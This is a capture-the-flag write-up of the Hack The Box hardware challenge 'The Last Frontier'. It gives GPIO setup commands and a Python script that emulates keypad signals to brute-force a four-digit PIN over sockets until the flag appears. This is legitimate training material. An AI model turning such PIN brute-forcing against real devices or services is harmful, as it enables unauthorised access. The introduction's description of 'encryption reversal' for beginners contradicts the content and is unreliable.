Post

HackTheBox The Last Frontier Writeup

Explore the basics of cybersecurity in the The Last Frontier Challenge on Hack The Box. This hard-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

Connect with nc and Setup the gpio

1
2
3
4
5
6
#cmd> comm-module-id
#id> 35
#Module ID set to 35
#cmd> GPIO
#set> 1 0
#GPIO-1 set to: 0

Disconnect and After

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
import socket
import time
import sys

if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port1,port2>")
    sys.exit(1)

host, ports_str = sys.argv[1].split(':')
ports = [int(port) for port in ports_str.split(',')]

key_presses = '5254#'
current_key_to_send = 0
keymap = {
    '1': ['E0', '0E'], '2': ['D0', '0E'], '3': ['B0', '0E'], 'A': ['70', '0E'],
    '4': ['E0', '0D'], '5': ['D0', '0D'], '6': ['B0', '0D'], 'B': ['70', '0D'],
    '7': ['E0', '0B'], '8': ['D0', '0B'], '9': ['B0', '0B'], 'C': ['70', '0B'],
    '*': ['E0', '07'], '0': ['D0', '07'], '#': ['B0', '07'], 'D': ['70', '07']
}

def interact_with_nc(sock_nc):
    sock_nc.sendall(b"system\n")
    time.sleep(0.5)
    response = sock_nc.recv(4096).decode('utf-8')
    print("Received from NC server:", response)
    return 'HTB{' in response

def simulate_keypad_read(command):
    global current_key_to_send
    if command == 'F0':
        key = key_presses[current_key_to_send]
        return keymap[key][0] + '\n'
    elif command == '0F':
        key = key_presses[current_key_to_send]
        current_key_to_send += 1
        return keymap[key][1] + '\n'
    else:
        return 'FF\n'

def run_client(server_host, server_port):
    global key_presses, current_key_to_send
    sock_nc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock_nc.connect((host, ports[0]))
    print("Connected to NC server.")
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((server_host, server_port))
        print("Connected to server")
        for pin in range(5000, 5254):
            key_presses = f"{pin:04d}#"
            print(key_presses)
            current_key_to_send = 0
            while True:
                data = sock.recv(1024).decode('utf-8').strip()
                if not data:
                    print("Server closed the connection")
                    break
                print(f"Received from server: {data}")
                response = simulate_keypad_read(data)
                if response:
                    sock.sendall(response.encode('utf-8'))
                if len(key_presses) == current_key_to_send:
                    break
                if data == 'quit': 
                    print("Quit command received")
                    break
            interact_with_nc(sock_nc)

if __name__ == "__main__":
    run_client(host, ports[1])

Wait for the pin to be bruteforced and it will reveal the flag

Summary

The The Last Frontier Challenge on Hack The Box is a hard-level challenge that focuses on advanced hardware manipulation and network communication. Participants configure GPIO settings via command-line, utilize socket programming to automate network interactions, and conduct a brute-force attack to decode a PIN. This challenge effectively combines hardware control with practical cybersecurity techniques.

This post is licensed under CC BY 4.0 by the author.